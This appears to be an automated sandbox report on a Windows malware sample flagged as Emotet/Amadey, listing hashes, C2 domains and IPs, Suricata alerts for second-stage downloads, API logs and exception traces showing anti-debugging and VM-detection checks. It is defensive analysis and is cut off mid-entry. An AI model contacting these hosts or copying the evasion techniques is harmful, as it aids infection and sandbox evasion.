Summary | ZeroBOX

download.php

Gen1 Emotet Generic Malware Themida Malicious Library Malicious Packer Downloader Admin Tool (Sysinternals etc ...) Antivirus UPX HTTP DNS ScreenShot Create Service DGA Hijack Network Http API Socket Escalate priviledges PWS Sniff Audio Steal credential
Category Machine Started Completed
FILE s1_win7_x6403_us April 21, 2025, 10 a.m. April 21, 2025, 12:55 p.m.
Size 2.1MB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 29e24525c83a49e30fc532e59f769b09
SHA256 c060719a3c3396dd56bf96418110513abd36346e6ccb0c53b441b002178d909a
CRC32 70095037
ssdeep 49152:12IWq19Dofd2p7bM0HzsugjCWNWV92qqW5XTw6dSbix3trUq:xNEfd2p77zsN89Tj5XE6djx3h
PDB Path wextract.pdb
Yara
  • PE_Header_Zero - PE File Signature
  • Malicious_Library_Zero - Malicious_Library
  • Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet
  • Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet
  • CAB_file_format - CAB archive file
  • IsPE32 - (no description)
  • UPX_Zero - UPX packed file

Name Response Post-Analysis Lookup
paguehojebrasil.shop 147.79.84.176
IP Address Status Action
147.79.84.176 Active Moloch
164.124.101.2 Active Moloch
185.215.113.41 Active Moloch
185.215.113.59 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 185.215.113.59:80 -> 192.168.56.103:49166 2400031 ET DROP Spamhaus DROP Listed Traffic Inbound group 32 Misc Attack
TCP 185.215.113.59:80 -> 192.168.56.103:49166 2060969 ET MALWARE Amadey CnC Response Malware Command and Control Activity Detected
TCP 192.168.56.103:49168 -> 147.79.84.176:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49168 -> 147.79.84.176:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49168 -> 147.79.84.176:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49175 -> 147.79.84.176:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49175 -> 147.79.84.176:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49175 -> 147.79.84.176:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49167 -> 147.79.84.176:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49167 -> 147.79.84.176:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49167 -> 147.79.84.176:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49180 -> 147.79.84.176:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49180 -> 147.79.84.176:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49182 -> 147.79.84.176:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49182 -> 147.79.84.176:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49182 -> 147.79.84.176:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49183 -> 147.79.84.176:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49183 -> 147.79.84.176:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49183 -> 147.79.84.176:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49170 -> 147.79.84.176:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49170 -> 147.79.84.176:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49174 -> 147.79.84.176:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49174 -> 147.79.84.176:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49174 -> 147.79.84.176:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49184 -> 147.79.84.176:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49184 -> 147.79.84.176:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49178 -> 147.79.84.176:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49178 -> 147.79.84.176:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 185.215.113.41:80 -> 192.168.56.103:49186 2400031 ET DROP Spamhaus DROP Listed Traffic Inbound group 32 Misc Attack
TCP 192.168.56.103:49178 -> 147.79.84.176:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49176 -> 147.79.84.176:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49176 -> 147.79.84.176:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49179 -> 147.79.84.176:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49179 -> 147.79.84.176:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49179 -> 147.79.84.176:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49186 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49186 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49186 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49186 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49204 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49206 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49206 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49206 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49206 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49204 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49204 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49204 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49206 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49208 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49208 2014819 ET INFO Packed Executable Download Misc activity
TCP 185.215.113.41:80 -> 192.168.56.103:49208 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49208 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49208 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49208 2015744 ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) Misc activity
TCP 192.168.56.103:49218 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49218 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49218 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49218 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49186 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49218 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49218 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49218 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49222 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49222 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49222 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49222 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49218 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49208 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 192.168.56.103:49210 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49210 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.41:80 -> 192.168.56.103:49210 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.41:80 -> 192.168.56.103:49210 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49210 -> 185.215.113.41:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 147.79.84.176:443 -> 192.168.56.103:49182 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49182 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49180 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49180 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49167 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49167 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49178 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49178 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49168 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49168 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49175 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49175 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49183 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49183 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49179 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49179 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49176 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49176 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49184 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49184 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49170 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49170 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49174 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 147.79.84.176:443 -> 192.168.56.103:49174 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Processing -WindowStyle 'H' failed: Cannot convert value "H" to type "System.Diagnostics.ProcessWindowStyle" due to invalid enumeration values. Specify one of the following enumeration values and try again. The possible enumeration values are "Normal, Hidden, Minimized, Maximized".
console_handle: 0x0000001f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047acd8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047ae18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047ae18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047ae18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a618
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a618
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a618
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a618
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a618
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a618
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047ae18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047ae18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047ae18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047ae18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047ae18
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
pdb_path wextract.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
resource name AVI
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: fb e9 4e 01 00 00 60 8b 74 24 24 8b 7c 24 28 fc
exception.symbol: 2w7420+0x2ff0b9
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 3141817
exception.address: 0x15ef0b9
registers.esp: 4062884
registers.edi: 0
registers.eax: 1
registers.ebp: 4062900
registers.edx: 24690688
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 63 06 00 00 58 33 14 24 31 14 24 33 14 24
exception.symbol: 2w7420+0x60dd8
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 396760
exception.address: 0x1350dd8
registers.esp: 4062848
registers.edi: 1971192040
registers.eax: 28282
registers.ebp: 4010274836
registers.edx: 19857408
registers.ebx: 3
registers.esi: 20254105
registers.ecx: 1971388416
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 88 04 00 00 89 e6 81 c6 04 00 00 00 57 bf
exception.symbol: 2w7420+0x612ce
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 398030
exception.address: 0x13512ce
registers.esp: 4062852
registers.edi: 1971192040
registers.eax: 4294941760
registers.ebp: 4010274836
registers.edx: 234729
registers.ebx: 3
registers.esi: 20282387
registers.ecx: 1971388416
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 55 57 e9 fa 04 00 00 81 c4 04 00 00 00 56 52
exception.symbol: 2w7420+0x61f51
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 401233
exception.address: 0x1351f51
registers.esp: 4062848
registers.edi: 1971192040
registers.eax: 31721
registers.ebp: 4010274836
registers.edx: 234729
registers.ebx: 20258215
registers.esi: 20282387
registers.ecx: 1514122494
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 d7 fc ff ff ba 5a ee fb 7b 31 54 24 04 5a
exception.symbol: 2w7420+0x6279c
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 403356
exception.address: 0x135279c
registers.esp: 4062852
registers.edi: 1259
registers.eax: 31721
registers.ebp: 4010274836
registers.edx: 234729
registers.ebx: 20261440
registers.esi: 20282387
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 29 f6 ff 34 0e ff 34 24 e9 b5 f9 ff ff 58 81
exception.symbol: 2w7420+0x1d1761
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 1906529
exception.address: 0x14c1761
registers.esp: 4062852
registers.edi: 20293856
registers.eax: 29706
registers.ebp: 4010274836
registers.edx: 376832
registers.ebx: 376832
registers.esi: 21761791
registers.ecx: 21791970
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 25 fc ff ff ff 0c 24 e9 2e 02 00 00 35 f6
exception.symbol: 2w7420+0x1d15be
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 1906110
exception.address: 0x14c15be
registers.esp: 4062852
registers.edi: 20293856
registers.eax: 29706
registers.ebp: 4010274836
registers.edx: 604292951
registers.ebx: 376832
registers.esi: 4294939964
registers.ecx: 21791970
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 81 ec 04 00 00 00 89 0c 24 55 bd 6b ee ff 7c
exception.symbol: 2w7420+0x1d7891
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 1931409
exception.address: 0x14c7891
registers.esp: 4062848
registers.edi: 21818087
registers.eax: 30178
registers.ebp: 4010274836
registers.edx: 1539368458
registers.ebx: 21786705
registers.esi: 21818103
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 51 b9 38 4f ff 7d 50 b8 01 58 b7 3b e9 44 00
exception.symbol: 2w7420+0x1d7a5c
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 1931868
exception.address: 0x14c7a5c
registers.esp: 4062852
registers.edi: 21818087
registers.eax: 30178
registers.ebp: 4010274836
registers.edx: 1539368458
registers.ebx: 21816883
registers.esi: 21818103
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 e8 02 00 00 5b 81 f5 69 dd df 2e 50 b8 8d
exception.symbol: 2w7420+0x1d7226
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 1929766
exception.address: 0x14c7226
registers.esp: 4062852
registers.edi: 0
registers.eax: 30178
registers.ebp: 4010274836
registers.edx: 1539368458
registers.ebx: 21789543
registers.esi: 50665
registers.ecx: 0
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 10 f8 ff ff 50 89 e0 05 04 00 00 00 e9 d0
exception.symbol: 2w7420+0x1d9789
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 1939337
exception.address: 0x14c9789
registers.esp: 4062852
registers.edi: 134889
registers.eax: 21825812
registers.ebp: 4010274836
registers.edx: 4294938692
registers.ebx: 132181889
registers.esi: 50665
registers.ecx: 1971442156
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed 64 8f 05 00 00 00 00 55 89 04 24 54 58 05 04
exception.symbol: 2w7420+0x1e24b9
exception.instruction: in eax, dx
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 1975481
exception.address: 0x14d24b9
registers.esp: 4062844
registers.edi: 134889
registers.eax: 1447909480
registers.ebp: 4010274836
registers.edx: 22104
registers.ebx: 1971327157
registers.esi: 21824621
registers.ecx: 20
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb
exception.symbol: 2w7420+0x1e11e5
exception.address: 0x14d11e5
exception.module: 2W7420.exe
exception.exception_code: 0xc000001d
exception.offset: 1970661
registers.esp: 4062844
registers.edi: 134889
registers.eax: 1
registers.ebp: 4010274836
registers.edx: 22104
registers.ebx: 0
registers.esi: 21824621
registers.ecx: 20
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 d4 2a 2d 12 01
exception.symbol: 2w7420+0x1e3b08
exception.instruction: in eax, dx
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 1981192
exception.address: 0x14d3b08
registers.esp: 4062844
registers.edi: 134889
registers.eax: 1447909480
registers.ebp: 4010274836
registers.edx: 22104
registers.ebx: 2256917605
registers.esi: 21824621
registers.ecx: 10
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 68 31 40 ff 28 89 34 24 be 00 69 31 7f 53 e9
exception.symbol: 2w7420+0x1e8f34
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2002740
exception.address: 0x14d8f34
registers.esp: 4062848
registers.edi: 134889
registers.eax: 21858476
registers.ebp: 4010274836
registers.edx: 2130566132
registers.ebx: 26522468
registers.esi: 10
registers.ecx: 1308426240
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 55 89 0c 24 b9 00 a2 e6 3f e9 a4 01 00 00 68
exception.symbol: 2w7420+0x1e8a79
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2001529
exception.address: 0x14d8a79
registers.esp: 4062852
registers.edi: 47200
registers.eax: 21861276
registers.ebp: 4010274836
registers.edx: 2130566132
registers.ebx: 26522468
registers.esi: 0
registers.ecx: 1308426240
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: cd 01 eb 00 8a ee e9 12 00 00 00 96 f2 c1 c5 65
exception.symbol: 2w7420+0x1e959f
exception.instruction: int 1
exception.module: 2W7420.exe
exception.exception_code: 0xc0000005
exception.offset: 2004383
exception.address: 0x14d959f
registers.esp: 4062812
registers.edi: 0
registers.eax: 4062812
registers.ebp: 4010274836
registers.edx: 21862055
registers.ebx: 21862055
registers.esi: 0
registers.ecx: 24832
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 55 c7 04 24 7e a4 f6 7e 81 0c 24 78 9b ff 6f
exception.symbol: 2w7420+0x1f8364
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2065252
exception.address: 0x14e8364
registers.esp: 4062852
registers.edi: 20251866
registers.eax: 28494
registers.ebp: 4010274836
registers.edx: 6
registers.ebx: 26522687
registers.esi: 1971262480
registers.ecx: 21950506
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 55 89 04 24 55 e9 9a fb ff ff 81 e9 9a 88 f7
exception.symbol: 2w7420+0x1f86b5
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2066101
exception.address: 0x14e86b5
registers.esp: 4062852
registers.edi: 20251866
registers.eax: 4294941900
registers.ebp: 4010274836
registers.edx: 2298801283
registers.ebx: 26522687
registers.esi: 1971262480
registers.ecx: 21950506
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 23 04 00 00 53 89 14 24 53 c7 04 24 ec 39
exception.symbol: 2w7420+0x1fa91b
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2074907
exception.address: 0x14ea91b
registers.esp: 4062848
registers.edi: 3996316878
registers.eax: 21931424
registers.ebp: 4010274836
registers.edx: 611634223
registers.ebx: 92830
registers.esi: 1991514346
registers.ecx: 633563838
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb e9 e4 01 00 00 55 e9 f2 01 00 00 5b 8f 04 24
exception.symbol: 2w7420+0x1fa737
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2074423
exception.address: 0x14ea737
registers.esp: 4062852
registers.edi: 3996316878
registers.eax: 21960782
registers.ebp: 4010274836
registers.edx: 611634223
registers.ebx: 92830
registers.esi: 1991514346
registers.ecx: 633563838
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 52 50 55 89 3c 24 bf 1b 3f de 73 e9 68 ff ff
exception.symbol: 2w7420+0x1fa701
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2074369
exception.address: 0x14ea701
registers.esp: 4062852
registers.edi: 262633
registers.eax: 21934302
registers.ebp: 4010274836
registers.edx: 611634223
registers.ebx: 92830
registers.esi: 0
registers.ecx: 633563838
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 83 ec 04 e9 04 fd ff ff 55 51 54 8f 04 24 e9
exception.symbol: 2w7420+0x1fd8f0
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2087152
exception.address: 0x14ed8f0
registers.esp: 4062844
registers.edi: 262633
registers.eax: 27090
registers.ebp: 4010274836
registers.edx: 611634223
registers.ebx: 92830
registers.esi: 21970651
registers.ecx: 633563838
1 0 0

__exception__

stacktrace:

        
      
      
      
exception.instruction_r: fb 50 e9 7f 03 00 00 5c 89 14 24 ba 82 f7 3f 7f
exception.symbol: 2w7420+0x1fdab7
exception.instruction: sti
exception.module: 2W7420.exe
exception.exception_code: 0xc0000096
exception.offset: 2087607
exception.address: 0x14edab7
registers.esp: 4062844
registers.edi: 262633
registers.eax: 27090
registers.ebp: 4010274836
